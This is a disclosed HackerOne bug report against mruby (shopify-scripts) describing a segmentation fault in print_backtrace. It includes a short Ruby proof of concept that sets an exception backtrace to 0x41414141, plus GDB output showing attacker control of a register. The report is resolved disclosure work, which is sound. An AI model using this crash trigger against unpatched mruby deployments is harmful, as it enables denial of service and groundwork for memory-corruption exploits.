Crash in print_backtrace

Disclosed: 2017-02-07 07:42:25 By tunz To shopify-scripts
Unknown
Vulnerability Details
This crash does not affect `mruby-engine` because it does not print the back trace in guest. We can control the register by setting a backtrace array. # PoC ```ruby exc = Exception.new() exc.set_backtrace([0x41414141]) raise exc ``` # GDB ``` $ gdb -q --args ./bin/mruby test12.rb Reading symbols from ./bin/mruby...done. (gdb) r Starting program: /home/tunz/working/mruby/mruby/bin/mruby test12.rb trace: Program received signal SIGSEGV, Segmentation fault. 0x0000000000422b88 in print_backtrace (mrb=0x2333010, backtrace=...) at /home/tunz/working/mruby/mruby/src/backtrace.c:222 222 fprintf(stream, "\t[%d] %.*s\n", i, (int)RSTRING_LEN(entry), RSTRING_PTR(entry)); (gdb) x/i $pc => 0x422b88 <print_backtrace+130>: mov eax,DWORD PTR [rax] (gdb) i r rax rax 0x41414141 1094795585 ```
Actions
View on HackerOne
Report Stats
  • Report ID: 197916
  • State: Closed
  • Substate: resolved
  • Upvotes: 3
Share this report